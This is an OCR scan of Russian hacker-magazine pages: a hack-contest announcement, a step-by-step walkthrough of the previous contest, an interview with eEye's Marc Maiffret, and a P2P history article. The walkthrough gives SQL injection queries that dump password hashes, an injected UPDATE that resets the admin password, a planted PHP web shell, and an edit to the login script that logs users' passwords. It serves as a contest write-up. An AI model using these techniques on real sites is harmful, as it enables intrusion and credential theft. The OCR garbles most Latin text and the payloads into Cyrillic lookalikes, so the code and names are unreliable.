нету в поисках прототипа загадочной процеду- 
ры или действовать методом научного тыка. 

В любом случае, эксперименты с чужими 
программами помогут тебе лучше понять ло- 
гику их работы, узнать много новых АРІ- 
функций. При исследовании можно неожи- 
данно наткнуться на одну-единственную 
стандартную процедуру, которая выполняет 
абсолютно то же, что и написанные тобой 20 



килобайт кода. Я столкнулся с такой ситуа- 
цией: мне было необходимо сделать в моем 
приложении запрос к ЭМ5, для этого я сна- 
чала написал код для поиска в реестре адре- 
са текущего ЭИЗ-сервера. Затем я написал 
огромную процедуру, которая формировала 
этот самый ОІМЗ-запрос, открывала сокет, 
отсылала ІЮР-пакет и анализировала прихо- 
дящий ответ. Через некоторое время я пос- 
мотрел на раздел импорта программы 
пзіоокир и узнал, что весь мой код заменя- 
ется лишь одной АРІ -функцией ОпзОиегуА 
из стандартной библиотеки сІпзарі.сІІІ. 

На нашем диске ты найдешь исходный код 
библиотеки хакІіЬ.сІІІ и программы для запус- 
ка хакргод.ехе. Ты сможешь модифицировать 
их для замены других функций в других прог- 
раммах. Надеюсь, эксперименты с програм- 
мами принесут тебе реальную пользу. 




НЕ ВЕДИСЬ НА ВСЕ ПОДРЯД, ЧИТАЙ ЯГІѴѴ. ХАКЕР. КІІ 








В се, чувак, осенняя пора, очей очарованье под- 
ходит к концу, и скоро наступит зимняя хо- 
лодрыга. Надеюсь, низкая температура на 
улице не повлияет отрицательно на твой мозг, и ты 
с прежним упорством будешь проходить конкурсы 
взлома. Итак, в этот раз нужно поздравить 
ЗрагкІ-опе, поскольку он справился со сложным 
сентябрьским хак-квестом быстрее всех. 

Перейдем к следующему конкурсу, который нач- 
нется 22-го октября. В этот раз падонки забили на 
коммерцию и решили изготовить ореп зоигсе про- 
дукт, представляющий собой чат. И пример рабо- 
ты, и сами сорцы их творения выложены на самом 
шѵѵ.расіопак.ги. 



Особенность этого чата заключается в том, что в 
нем есть приватные комнаты, в которых сидят и са- 
ми падонки. Если тебе удастся поломать чат, то ты 
сможешь прочитать логи их разговора. Они умуд- 
рились оставить там инфу, которая поможет тебе 
украсть неплохой шестизначный уин. 

А основные шпги: 

О. Анализируешь сорцы чата. 

О. Находишь место, где можно совершить зці- 
іпіесііоп и получить доступ к привату. 

Ѳ. Думаешь, как ты можешь использовать то, 
что написали падонки. 

О. Используешь инфу и угоняешь 11114. 



А СЕНТЯБРЬСКИЙ КОНКУРС 



А вот что нужно было делать для того, чтобы пройти конкурс прош- 
лого номера: 

О. Зайти на сайте ШѴѴ.расІОПак.Ш в раздел «Поиск друга», 
о. Перейти на вторую страницу результатов поиска. Вот что мож- 
но наблюдать в строке браузера: ѵѵѵѵѵѵ.рас]опак.ги/ѵіеѵѵ.рІір?раде=сІаіа/ 
$еагсііге$и1№$іс1=7&1п=1. Видишь, переменной зісі передается значение 
«7». Если вместо семерки ты подставил бы какие-нибудь левые 
данные, например «дЬкІідіГі», то увидел бы появившуюся надпись 
«Ошибка 50І_. Невозможно создать переменные запроса на поиск 
из БД». Это говорит о том, что сайтовый движок использует 30І_ и 
можно попробовать провести атаку ЗОІ_-іпіес1:іоп. 
о. Передаешь скрипту, например, такие параметры: 

ѵѵѵѵѵѵ.рас]опак.ги/ѵіеѵѵ.рІір?раде=сІаіа/$еагс[іге$иИ&$ісІ=2 , 8(1;п=0&[іеаг=-18(тіпаде=0&тах- 
аде=0&$ех=-2 Ш(М 5ЕІ.ЕСТ ШШ, ЛІШ, ІШ, ШШ, МИ, N1111, Ш, N011. 

Результат этого запроса говорит о том, что мы на верном пути. 

О. Теперь нужно угадать название таблицы, которая хранит в себе 
аккаунты юзеров. Для этого исполняем запрос ѴѴѴѴѴѴ.расІОПак.ги/ 
ѵіеѵѵ.рІір?раде=с1аіа/$еагсІіге$иИ&$ісІ=2 , &І;п=0&[іеаг=-1&тіпаде=08(тахаде=0&$ех=-2 Ш(М 
$ЕИСТ N011 N011 N011 N1111, N011 Ш, N011, N011 ЕРОМ <имя_таблицы>. Если таб- 
лица, имя которой ты подставишь в этот запрос, существует, то кро- 
ме надписи «Ошибка ЗОІ_» ты увидишь еще кое-какую инфу (смотри 
видео, посвященное прохождению конкурса). 

©.Допустим, имя таблицы, в которой хранятся учетные записи 
юзеров, ты угадал (в нашем случае она называлась «изегз»). Те- 
перь исполняешь запрос ѵѵѵѵѵѵ.рас]опак.ги/ѵіеѵѵ.рІір?раде=сІа1;а/$еагсІіге- 
$иІІ&5І(1=2 , &Іп=0&Ііеаг=-1&тіпаде=0&тахаде=0&$ех=-2 М 5Е1ЕСТ Ш, ІШЬ, 
ПІск, ІСІ, ра$$, N1111, N1111, N1111 ЕРОМ и$ег$, который покажет хэши пассов 
и уникальные идентификаторы (ісі) всех юзеров. Берешь адми- 
нский ісі и вставляешь его в свои куки, после чего сам стано- 
вишься админом. 



©. Для того чтобы войти в админ-интерфейс, мало быть просто за- 
логиненным под админом. Нужно ввести пасс администратора пов- 
торно. Но его-то мы не знаем, и тсІ5-хеш админа в нашем случае то- 
же расшифровать нереально - пароль падонкаф слишком длинный. 
Поэтому мы делаем такой трюк. Сначала генерим плсІ5-хеш какого- 
нибудь случайного пароля. Например, зашифрованный пасс «рабоп- 
ак» будет иметь вид «1 8б5б25а4397беЬеЗб05б9а9Ь250а9сЗ». Идем 
на страницу «Редактировать инфу о себе». Вставляем этот хеш в по- 
ле «ІМіск», а в поле «Возраст» вписываем «1, разз=піск» и жмем 
«зиЬпліІ:». В результате 301_-запрос, обновляющий инфу, будет выг- 
лядеть так: ІІРЭАТЕ изегз ЗЕТ піск= 

’18б5б25а4397беЬеЗб05б9а9Ь250а9сЗ', плаіі-', аЬоиі-', Неаг=0, 
аде=1 , разз=піск, зех=0 ѴѴНЕВЕ Іодіп- абтіп'. После того как запрос 
исполнится, поле «Разз» в базе данных изменится на 
«18б5б25а4397беЬеЗб05б9а9Ь250а9сЗ». 

Теперь можно смело логиниться под админом с паролем «рабопак». 

©. В админской панели управления можно редактировать новости. 
Эти новости, в свою очередь, записываются в текстовый файл, путь к 
которому хранится в Ыббеп-параметре заѵеаз. Если поменять имя 
файла, в который запишется новость с саіаіод/баіа/тедапеѵѵз/рабоп- 
акпеѵѵз.М, на зТіеІІ.рТір и запостить новость «<? зуз1:ет($сплб);?>», на 
сервере появится новый файл ѴѴѴѴѴѴ.расІОПак.ги/$ІіеІІ.рІір, содержащий за- 
ветную строку «<? зуз1епп($стб);?>», которая дает тебе шелл-доступ к 
серверу. Для выполнения этой операции утилита «АссеззЭгіѵег» ока- 
зывается незаменимой. 

©. Так как Сука-масука заходит на сайт службы знакомств падон- 
каф часто, то и свой пароль он набирает тоже часто. Поэтому необ- 
ходимо изменить скрипт Іодіп.рГір так, чтобы он І_ОСировал куда- 
нибудь все набранные пользователями пассворды. После того как 
злобный гук залогинится в очередной раз, пароль, который он ввел, 
запишется в Іод-файл, откуда сможет быть легко извлечен. 

©. Наконец, заключительный этап. Вытаскиваешь из лога па- 
роль Суки-масуки и логинишься в его почтовом ящике (па- 
роль совпадает с пассом от его мыльника). 
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И то, по-твоему, главный хакер? Ричард Стоплман? Старо. Кевин Митник? Попсово. Марк Иэйфрет из еЕуе ПідіІаІ Зесигііу считает 
главным хакером себн. И даже занимает в компании официальную должность с одноименным названием. 

Как бы то ни было, еЕуе - одна из ведущих зесигііу-фирм на мировом рынке, услугами которой пользуются правительственные и 
крупнейшие коммерческие организации. П сам Марк широко известен в зесигііу-кругах и сделал достаточный вклад в развитие 
компьютерной безопасности, чтобы заслужить уважение. Поэтому сегодняшнее интервью именно с ним. 

ТЕКИПП - СЕКРЕТ УСПЕХИ В 8ЕС1ІПІТѴ-БИЗНЕСЕ 



іпсіѵѵОгк; Марк, расскажи, по- 
жалуйста, о своей компании. 
Не рекламный буклет в духе 
«Мы все можем», больше про 
атмосферу внутри, про своих 
сотрудников, локальные ме- 
роприятия и забавные эпизо- 
ды из жизни еЕуе. 

ММ: еЕуе ОідііаІ Зесигііу стала уже дос- 
таточно большой компанией - сейчас у нас 
работает свыше 140 человек. Поэтому если 
говорить об атмосфере, многое зависит от 
того, о каком отделе идет речь: исследова- 
тельском, инженерном, отделе продаж или 
каком-нибудь другом. В любом случае, 
еЕуе - это место, где ты можешь чувство- 
вать себя комфортно, будучи самим собой. 
Большинство забавных эпизодов происхо- 
дит со мной и моей командой исследовате- 
лей, когда мы идем тусить своей компаш- 
кой. После целого дня, проведенного за 
чтением всех этих ламерских эдвайсоров 
на багтраке и еще более ламерского кода 
МІСГ 050 Й, приятно посетить какую-нибудь 
пивнушку и напиться до чертиков. Наш 
главный офис, который находится в Кали- 
форнии, расположен рядом с пляжем. И 
там полно отличных баров, которые мы 
частенько посещаем. Названия историй, 




которые я мог бы рассказать, звучали бы 
так (идет перечисление спиртных напит- 
ков): іециііа, ТИе Вит Тозз, ЗІорру 3, Ое\ 
Тасо... Скажу еще, что большинство баров, 
где мы колбасились, после этого навсегда 
закрывали для нас двери :). 

тіпсІѵѵОгк: Я впервые вижу позицию 
«главный хакер» в качестве официальной в 
крупной компании. Расскажи, чем ты зани- 
маешься в этой должности? И как выглядит 
твой рабочий день? 



ММ: «Главный хакер» - этот титул я соз- 
дал для себя сам. В некоторой мере пото- 
му, что работать на такой должности до- 
вольно забавно, но основная причина - мне 
кажется, понимать хакерство важно, если 
ты являешься разработчиком зесигііу-соф- 
та. В еЕуе я занимаюсь многими вещами, 
от управления исследовательской коман- 
дой до разработки дизайна будущих про- 
дуктов нашей компании и встреч с клиента- 
ми. Больше всего в моей работе мне нра- 
вится разнообразие. 
Я могу сегодня за- 
ниматься чем-то 
очень низкоуровне- 
вым, вроде исследо- 
вания новых уязви- 
мостей и эксплои- 
тов, а завтра - про- 
водить презентации 
наших разработок в 
зале, полном на- 
чальства. 

тіпсІѵѵОгк: Я слы- 
шал, вы помогаете 
правительственным и 
военным структурам 
повысить безопас- 
ность их компьютер- 
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ИНТЕРВЬЮ С главный КОКЕРОМ ЕЕѴЕ 




Официальный сайт еЕуе ОідііаІ Зесигііу 




Логотип еЕуе 



ных систем. Насколько защищены эти систе- 
мы на самом деле? 

ММ: Некоторые правительственные аген- 
тства действительно являются клиентами 
еЕуе и используют наш софт, чтобы защи- 
тить свои сети. Но дать однозначный ответ, 
секурны системы правительства США или 
нет, сложно - слишком велико само прави- 
тельство. Некоторые организации намного 
более защищены, чем другие. Но вообще 
чиновники в правительстве больше любят 
поговорить о проблемах безопасности, чем 
заняться ее организацией. 

тЫмОгк: Какого рода секурное ПО ус- 
тановлено на их компах? Насколько компе- 
тентен правительственный техперсонал? 

ММ: У правительства есть все виды се- 
курного ПО, какие только можно предста- 
вить. Часто возникает ситуация, когда ему 
нужно нанять ведущих зесигііу-экспертов, но 
денег на это оно тратить не хочет. А с какой 
стати блестящему специалисту по сетевой 
безопасности идти работать на правитель- 
ство за половину суммы, которую он может 
заработать, работая на коммерческую орга- 
низацию? До тех пор пока правительство не 
осознает, что на обеспечение своей безо- 
пасности нужно выделять больше средств и 
привлекать к этому лучших экспертов, оно 
будет оставаться в задних рядах по степени 
защищенности своих систем. 

тЫмОгк: еЕуе - один из лидеров зеси- 
гііу-рынка и одна из самых авторитетных 
зесигііу-компаний. В чем, по-твоему, причи- 
ны ее успеха? В чем достоинства еЕуе по 
сравнению с конкурирующими компаниями? 

ММ; Текила. Много текилы! :) Мне кажет- 
ся, секрет успеха компании в том, что мы 
нанимаем только тех людей, которые испы- 
тывают настоящую страсть к исследованию 
безопасности и технологий. В то время как 
многие секурити-компании нанимают «рок- 
звезд», хакеров, которые больше увлечены 
популяризацией своего имени и своей при- 
надлежностью к сцене. Возможно, раньше у 
них и было стремление исследовать, но те- 
перь огонь погас, страсть улетучилась и на 
первый план встали деньги. 

тЫмОгк: Ты наверняка общался со 
многими известными коллегами в зесигііу- 



сфере. Поделись своим мнением о некото- 
рых из них. Я читал биографии Дэна Фарме- 
ра, Алана Коха, Вица Венемы, Стива Белло- 
вина и других. Но, возможно, ты мог бы дать 
неофициальное представление о них? 

ММ; Дэн, Кох, Венема, Стив... Полагаю, 
когда эти парни сделали себе имена, меня 
еще не было на этом свете. Хе-хе :). По 
правде, я никогда не общался лично ни с 
кем из них, но изучал многие их работы, 
особенно когда только начинал знакомиться 
с миром компьютерной безопасности. Я счи- 
таю их пионерами в своей области и реко- 
мендую всем, кто планирует серьезно за- 
няться безопасностью, почитать книги и до- 
кументации, написанные этими людьми. 
Знать прошлое и то, откуда пришло настоя- 
щее, не менее важно, чем знать само насто- 
ящее. Конечно, многие старых технические 
мануалы уже неактуальны, но читать их по- 
лезно хотя бы потому, что они воспитывают 
в тебе определенный склад ума. Мышление 
хакера. Книга Дэна Фармера «Ітргоѵіпд ІІге 
Зесигііу о\ Уоиг Зйе Ьу Вгеакіпд Іпіо К» явля- 
ется отличным тому примером. 

тЫѵѵОгк: А если взять хаксцену и моло- 
дых ребят-хакеров, кого бы ты выделил? 

ММ: Я всегда считал ІОрМ и АЭМ пионе- 
рами, тимами, которые являются двигателем 
прогресса в зесигііу-области. Кроме них есть 
много других групп, к которым я испытываю 
большое уважение. Жаль, что большинство 
людей, которые раньше были креативными и 
делали значимый вклад в зесигііу-комьюни- 
ти, теперь перестали заниматься исследова- 
тельской деятельностью. Или поступили на 
работу в компании, где результаты их иссле- 
дований держатся в тайне от общества. Я, 
наверное, становлюсь слишком стар... прос- 
то скучаю по старым добрым временам :). 

тіпсІѵѵОгк: Расскажи о самых интересных 
зесигііу-мероприятиях, в которых тебе дово- 
дилось участвовать. 

ММ: Самые яркие воспоминания остались 
о ВІаскІіаІ Ѵедаз 2003. Вегас всегда вызывает 
у меня положительные эмоции, но в 2003 го- 
ду было особенно здорово. Мне удалось 
встретиться со многими старыми друзьями- 
хакерами и познакомиться с интересными 
людьми, причастными к компьютерной безо- 
пасности. Разъезжать по всему Лас-Вегасу, 
упиваться вусмерть, совершать безумные 
поступки вместе со старыми друзьями и ре- 
бятами из еЕуе - это было незабываемо. Вто- 
рая любимая зесигііу-конференция - АЭ200Х, 
которая состоялась в Японии в 2003 г. Один 
из моих работодателей является организато- 
ром этой конфы, так что он, я и несколько 
других исследователей отправились в Токио 
выступить с докладом. Токио - удивительный 
город, и там много очень талантливых японс- 
ких хакеров. Мы классно зажгли! :) 

тіпсІѵѵОгк: Насколько перспективна сей- 
час в США карьера в сфере компьютерной 




безопасности? Какой средний оклад получа- 
ют специалисты в вашей стране? 

ММ: В США зесигііу-специалисты очень 
востребованы. Лично я каждый раз сталки- 
ваюсь с проблемой, когда нужно нанять ум- 
ных, креативных специалистов. Есть куча 
людей, которые утверждают, что разбирают- 
ся в компьютерной безопасности, но лишь 
единицы из них имеют необходимые техни- 
ческие навыки. Оклад очень сильно варьиру- 
ется и в основном зависит от того, где 
именно в США ты живешь. Для работника в 
сфере зесигііу цифры такие: от 65 до 200 
тысяч долларов в год, в зависимости от тво- 
его уровня и того, чем ты занимаешься. 

тЫѵѵОгк: На что работодатели обращают 
внимание в первую очередь на собеседовании? 

ММ: Каждый работодатель имеет свои 
заморочки. Многие компании предпочитают 
сотрудников со степенью или имеющих опыт 
работы в сфере зесигііу. Лично я, когда про- 
вожу собеседование с новым человеком, не 
обращаю внимание на эти вещи. Я просто 
ищу людей, которые понимают безопасность 
на очень низком уровне, которые смогут на- 
ходить уязвимости, писать утилиты, генери- 
ровать идеи. Людей, у которых есть чему по- 
учиться. Пионеров. Если ты такой - шли мне 
свое резюме, и кто знает... :) 
тіпсІѵѵОгк: Какие были самые опасные уяз- 
вимости, найденные в 2004 году? Какие уязви- 
мости могут стать самыми опасными в 2005? 

ММ: 2004 - АЗМ (баг в АЬзІгасІ !\ІоМіоп 
иЬгагу). Хотя ни у кого не хватило смелости вы- 
ложить публичный экплоит, я по-прежнему счи- 
таю эту уязвимость самой опасной в этом году. 

В 2005 г. «СІіепІ зісІе»-баги будут оставать- 
ся самыми опасными, и именно о них должен 
волноваться коммерческий сектор. Такого ро- 
да уязвимости позволяют плохим парням 










проникать через сетевой периметр и перехва- 
тывать контроль над системами во внутрен- 
них сетях, уровень секурности которых обыч- 
но чрезвычайно низок. Хорошей иллюстраци- 
ей тому может стать недавняя вспышка гего- 
бау Іпіегпеі Ехріогег уязвимостей. 

тіпсІѵѵОгк: Что ты думаешь о намерениях 
Большого Брата держать всех под колпаком? 

ММ: Имхо, правительство, как и церковь, 
всегда будет делать все возможное, чтобы 
«пасти овечек». И чем больше люди будут 
зависеть от технологий, тем легче будет 
Большому Брату за ними наблюдать. 

тЫшОгк: Насколько целесообразны 
системы тотального слежения? И насколько 
преуспел Большой Брат в своей цели на се- 
годняшний день? 

ММ: Это зависит от того, что ты имеешь 
в виду, говоря «Большой Брат». Не во всех 
странах у правительства есть возможность 
шпионить за людьми. Это может стать проб- 
лемой там, где мало распространен интер- 
нет и вообще хай-тек. В то же время в США, 
Китае и некоторых других странах, которые в 
техническом плане очень развиты, Большой 
Брат хорошо подкован и, конечно, шпионит 
за народом. В развитых странах у прави- 
тельства более чем достаточно возможнос- 
тей держать тебя под колпаком. В некоторых 
случаях стоит доверять своему правитель- 
ству в том, что оно не будет злоупотреблять 
своей властью. Но мы все знаем, что ошиб- 
ки и тайный сговор - это реальность. Поэто- 
му нужно постоянно быть в курсе вещей, ко- 
торые происходят вокруг. Конечно, можно 




«Идеальная система обеспечения зесигііу», которой придерживается еЕуе 




из официального пвоигп 

Еуе ЭідйаІ Зесигйу - ведущий разработчик ПО в сфере компь- 
6 ютерной безопасности с уникальным подходом к проблеме: 
устранить очаги проблемы, а не оградить их. Широкий диапа- 
зон зесигйу- решений, которые предлагает компания, позволяет 
организациям контролировать весь цикл угроз: до, в течение и 
после атак. Основанная в 1998 г., еЕуе ОідйаІ Зесигйу защищает 
системы более 2500 корпоративных и правительственных кли- 
ентов в более чем восьми странах. Среди продуктов еЕуе файр- 
волы, системы обнаружения атак, сканеры: Рейпа Ыей/ѵогк 
Зесигйу Зсаппег, Рейпа Реппесііайоп Мападег, РЕМ Зесигйу 
Мападетегй Сопзоіе, Ігіз Ыейл/огкТгаТСіс Апаіугег, ЗесигеІІЗ ѴѴеЬ 
Зегѵег Ргсйесйоп, ВІіпк ѴиІпегаЬіІіѣу Ргеѵепйоп Зузіет. Исследо- 
вательская команда из еЕуе обнаружила больше критических 
уязвимостей, чем любая другая организация в мире. 



1 В развитых странах у правительства более 1 
нем достаточно возможностей держать 
т тебя под колпаком. т 



стать экстремистом и полностью изолиро- 
вать себя от технологий, держаться подаль- 
ше от компьютерных систем. Но в этом слу- 
чае трудно жить нормальной жизнью. И ты 
закончишь, как Осама бин Ладен, скрываю- 
щийся в гребаных пещерах :). Поэтому ты 
должен сам определить для себя правиль- 
ный баланс между нормальной жизнью и не- 
доверием к системам тотального слежения. 

В США, например, сейчас наблюдается 
массовое помешательство на голосованиях. 
Я согласен с тем, что определение, чего хо- 
тят в большинстве своем люди, - вещь важ- 
ная. Но при голосовании нужно ввести лич- 
ные данные, и это идет вразрез с некото- 
рыми законами о приватной жизни. Так как 
плохие парни, опять же, могут легко полу- 
чить о тебе и твоей жизни всю нужную ин- 
формацию. 

тіпсІѵѵОгк: Расскажи о самых защищен- 
ных в мире компьютерных сетях. Где они ис- 
пользуются и как организована в них защита? 

ММ: Самые секурные сети, как и самый 
секурный софт - это те, о которых букваль- 
но никто не знает. И если люди узнают об 
этой сети, то она перестает быть защищен- 
ной. Она становится даже менее защищен- 
ной, чем те, о которых все знают уже дав- 
но. Возьмем для примера огромные софт- 
варные корпорации, такие как ІВМ, 
РеорІезоЙ, Сотрійег Аззосіаіез и др. Мно- 
гие из них ведут критические части своего 
бизнеса (финансовая система, базы дан- 
ных) на программах, которые никогда рань- 
ше не исследовались на наличие уязвимос- 
тей. Они считают, что их программные па- 
кеты стоимостью в миллионы долларов на- 
дежно защищены, так как в Сети нет ника- 
ких упоминаний о багах в них. Но на самом 
деле это ложное мнение. Причина того, что 
зесигйу-эдвайсоры по этому ПО еще не бы- 
ли опубликованы, лишь в том, что хакеры 
не имеют к нему доступа и еще не успели 
его взломать. В то же время зарубежное 
правительство к подобному софту доступ 
имеет и находит в нем уязвимости, не со- 



общая об этом широким массам. Такова 
печальная реальность. 

тЫшОгк: Как насчет проблемы безопас- 
ности мобильных платформ (мобильные те- 
лефоны, КПК, Ыиеіооіб и беспроводные гад- 
жеты)? Актуальна ли она сейчас? Какой вред 
плохие парни могут причинить таким устрой- 
ствам? И какой они уже успели причинить? 

ММ: Когда разговор заходит о мобиль- 
ных устройствах, степень их защищенности 
практически всегда преувеличивается. У них 
есть свои проблемы, но я не думаю, что сей- 
час нужно переживать о появлении настоя- 
щего червя для тех же мобильников. Пока 
нет четкой стандартизированной платформы 
для мобильных телефонов, риск невелик. 
ЗутЬіап, М іеговой и многие другие компа- 
нии борются за право стать такой платфор- 
мой. И как только одна из них (больше всего 
шансов у МісгозоЙ) станет стандартной, поя- 
вятся критические уязвимости, черви, атаки. 
А до тех пор все эти разговоры о безопас- 
ности беспроводных устройств будут прохо- 
дить больше для развлечения, чем для ре- 
шения проблем. 

тіпсІшОгк: Мне интересно твое мнение, 
какие могут быть последствия, если завтра 
вдруг рухнет весь интернет. Причем на дли- 
тельное время (сутки). Кто больше всего от 
этого пострадает? И возможно ли теорети- 
чески такое? 

ММ: Вау :). Это действительно сложный 
вопрос, и я не уверен, что у меня хватит ква- 
лификации на него ответить. По своему опы- 
ту я знаю, что многие компании напрямую 
зависят от интернета и не смогут работать 
без доступа к Сети. Очевидно, что они по- 
терпят большие убытки, случись что. Да и 
простые люди с каждым днем все больше 
привязываются к сетевым технологиям, по- 
мимо работы. Что касается того, возможно 
или нет, - мой ответ: «Да». 

тЫілЮгк: Ты когда-нибудь встречал де- 
вушку, которая в сфере компьютерной безо- 
пасности не уступала по уровню тебе? Или 
даже превосходила тебя в некоторых вещах. 





Что ты думаешь о девчонках, которые любят 
никсы и пишут эксплоиты? Это вообще нор- 
мально для девушки? :) 

ММ; Да, я встречал женщин, весьма ква- 
лифицированных специалистов. Но их очень 
немного. Намного больше «элитных хакг- 
рупп», куда входят девицы, посещающие 
зесигііу-конференции, но ничего не знающие 
о компьютерной безопасности. Но, опять же, 
таких парней намного больше. 

Если тебе удастся отыскать симпатичную 
малышку, которая пишет эксплоиты, дай 
мне знать :). 

тіпсІѵѵОгк : Какие книги ты мог бы наз- 
вать «Хакерской Библией»? Дай список книг, 
которые, по твоему мнению, должен прочи- 
тать каждый зесигііу-эксперт. 

ММ; Я никогда не читал книг по компью- 
терной безопасности. Если ты хочешь потра- 
тить свое время на чтение книг, тогда проч- 
ти книги по программированию. А если ты 
по-настоящему хочешь стать авторитетным 
зесигііу-экспертом, тогда научись програм- 
мировать и изучи, как работают операцион- 
ные системы. Вот тебе список необходимых 
знаний: С, С++, Ассембли, понимание ОС, 
ядра, процессов, структуры памяти, класси- 
фикации атак (оѵегТІоѵѵз, ТогтаІ зігіпдз, Іодіс 
Ьидз и др.). Не трать свое время на чтение 
дерьма вроде «Наскіпд ехрозесі». Это никуда 
тебя не приведет, кроме, разве что, позиции 
тупого консультанта в какой-нибудь 
РоипсІзТопе. 

тіпсІѵѵОгк ; Что тебе известно о русском 
зесигііу-комьюнити? Тебе приходилось об- 
щаться с нашими ведущими спецами? 

ММ; Русские хакеры наряду с китайцами 
самые крутые. Некоторые доклады и прог- 
раммы, сделанные русскими хакерами, нам- 
ного более продвинуты, чем релизы других. 
Мы в еЕуе любим шутить, что русские хаке- 
ры такие крутые, потому что в России охре- 
неть как холодно, и они скорее останутся до- 
ма читать книги по Азму, в то время как мы 
будем хлестать текилу на пляжах солнечной 
Калифорнии :). 

тіпсІѵѵОгк: Что сейчас чаще всего явля- 
ется лакомым куском для кракеров (блэк-хэ- 



тов)? Какие были самые классные хаки, о ко- 
торых ты слышал? 

ММ; В последнее время с этим тихо. 
Проблеме безопасности сейчас посвящается 
много внимания, компании начинают по-нас- 
тоящему заботиться о сохранности своей ин- 
формации и все чаще приглашают экспертов 
для консультации и аудита. Поэтому чем 
дальше, тем меньше остается багов для ис- 
пользования блэкхэтами. 

тіпсІѵѵОгк: Есть ли система, которую ты 
не в силах взломать? Вспомни самую труд- 
ную для тебя ОС. 

ММ; ѴѴіпсІоѵѵз 95. 

тіпсІѵѵОгк: Твое мнение о компьютерных 
законах. Их достаточно хорошо сформулиро- 
вали, или ты бы внес поправки? 

ММ; Я считаю, что с помощью законов, 
касающихся компьютерных преступлений, 
правительство и органы пытаются подняться 
в глазах народа. Не понимаю, как они могут 
засадить совсем молодого парнишку на бо- 
лее длительный срок, чем насильника? В 
этом нет смысла, но это распространенная 
ситуация. Люди боятся того, чего не могут 
понять, поэтому совершают безумные вещи. 
Например, сажают парня в тюрьму на 5 лет 
только за то, что он постебался над сайтом 
компании. 

тіпсІѵѵОгк: Твои ассоциации со словами: 
компьютер, девушка, лучшее, фильм «Хакеры», 
ОеТсоп, детство, ІВС, США, наука, еда, вирту- 
альная реальность, Гибсон, семья, зло, руг. 

ММ; Компьютер - ненависть, девушка - К., 
лучшее - секс, фильм «Хакеры» - вдохновение, 
ОеТсоп - дгоиріез (презрительное по отноше- 
нию к неквалифицированным хакгруппам - 
прим. тіпсІѵѵОгк), детство - жестокость, ІВС - 
черная дыра, США - дом, наука - логика, еда - 
блондинки, Гибсон - 1_ез РаиІ, семья - еЕуе, 
зло - апатия, рут - система. 

тіпсІѵѵОгк: Чем бы ты занимался на мес- 
те президента корпорации МісгозоТГ? :) 

ММ; Мучался бессонницей по ночам, 
зная, сколько компаний я выбил из бизнеса 
и сколько человеческих жизней разрушил. 
Попытался бы изменить своей жене со своей 
секретаршей. 



Некоторые доклады и программы, 
сделанные русскими хакерами, намного 
более продвинуты, нем релизы других. 
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0 наше время придумать что-то практически нереапьно. В попитике все сюжеты переиграны, в питературе все приемы использованы, 
в истории важные события продублированы неоднократно. Некоторые идеи, реализованные в одной области, зачастую успешно 
используются в совершенно другой. Именно так появились пиринговые сети, которыми сейчас пользуются миллионы человек во 
всем мире. О началось все в далекой, загадочной Индии... 



новый взгляд НО ПИРИНГОВЫЕ сети 
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Л ИСТОРИЯ ПОНКОСТЕРСКОЙ 
СИСТЕМЫ 

З ндрю Белл - человек в нашей 
стране не самый известный. 

А ведь именно он в конце XVIII 
века изобрел новую систему 
взаимного обучения, которая 
в России получила название 
Ланкастерской системы 
(в честь его последователя 
Джозефа Ланкастера), а на Западе - Белл- 
Ланкастерской системы. Взаимное обучение - 
это система для бедных людей, на которых 
не хватает преподавателей. В ее основе ле- 
жит принцип взаимопомощи тех, кто не мо- 
жет позволить себе учиться в дорогих вузах. 
«Если ты в чем-то разбираешься лучше сво- 
его соседа - объясни ему это, он, в свою 
очередь, объяснит тебе то, в чем сам хоро- 
шо разбирается». К тому же известно, что, 
обучая других, ты учишься сам. Ланкастер, 
известный меценат, в то время содержал на- 
родную школу в Лондоне, у которой, 
собственно, были те же самые задачи, что 
и у проповедника Белла: дать информацию 
людям, у которых ничего нет. Основная зас- 
луга Дж. Ланкастера заключается в том, что он 
популяризировал систему взаимного обучения. 



О новой методике взаимного обучения в 
России узнали только после войны 1812 года. 
С этого времени внедрение Ланкастерской 
системы целиком проходило под патронажем 
Министерства народного просвещения и Воен- 
ного министерства, которое распространило 
новый метод на военные поселения. Ланкасте- 
рскую систему активно применяли декабристы 
для обучения неграмотных крестьян. Не было 
ни одной школы, в которой отличники не под- 
тягивали неуспевающих одноклассников. Но со 
временем популярность системы снижалась и 
в конце концов вообще канула в Лету. Но у 
этой истории есть продолжение. 

Эндрю Белл придумал не просто новую 
систему образования, он придумал новый 
способ распространения информации: от рав- 
ного к равному, от ученика к ученику. Пусть 
даже один умнее или образованнее, но в рам- 
ках этой системы у них одинаковый статус, 
что и определяет способ передачи данных. 

Л ПЕРВЫЕ ПИРИНГОВЫЕ СЕТИ 

В сентябре 1 999 года сюжет взаимного обу- 
чения обрел неожиданное продолжение. Мо- 
лодой программист Шон Фэннинг предста- 
вил бета-версию проекта, который вскоре 
получил название ІМарзІег. Группа ѵѵООѵѵОО, 
членом которой был Фэннинг и в рамках ко- 




торой вначале распространялась бета-вер- 
сия, тогда еще не была легендарной. Прос- 
лавилась она благодаря Марзіег’у, всего за 
год ставшему едва ли не самым популярным 
брендом в интернете. 

Вообще, №рзІег не был пиринговой сетью 
в чистом виде: р2р-соединение работало 
только на этапе закачки. Во всех других слу- 
чаях приходилось обращаться к серверу: при 
регистрации, при предоставлении информа- 
ции о хранящихся файлах, при поиске инте- 
ресующего файла. Причиной того, что 
ІМарзІег стал настолько популярным приложе- 
нием, была возможность быстро и бесплатно 
скачать информацию, в данном случае музы- 
ку. Как известно, именно завязка на основ- 
ной сервер его и сгубила. Следующим шагом 
развития р2р должны были стать децентра- 
лизированные системы. На пути к заветной 
цели появлялось множество переходных про- 
ектов. Например Кагаа и Е0опкеу2000. 

Особую роль в пиринговых системах сыгра- 
ла СпиІеІІа. Когда компания Атегіса Оп І_іпе ре- 
шила создать сетевое чудо, никто не предпола- 
гал, что вскоре появится непобедимая сеть, ко- 
торую даже сами разработчики не смогут унич- 
тожить. В отличие от других р2р-сетей, СпиІеІІа 
не содержала ни одного центрального узла. 
Узлами соединения в этой системе были сами 
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немного статистики 
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ВіНогепІ - 1 000 000 участников 
ОѵегЫеі - 974 848 участников (постоянно растет) 
Оігесі Соппесі - 262 554 участников 
ейопкеу - 2 1 14 034 участников 

V 



ч + . 



ПиСІ€У5 



пользователи, что означало буквальную реали- 
зацию принципа реег-іо-реег. 

Несмотря на то что №р5Іег уже давно зак- 
рыли, а ОпіЛеІІа потеряла свою популяр- 
ность, о них не стоит забывать - именно эти 
приложения задали основную тенденцию 
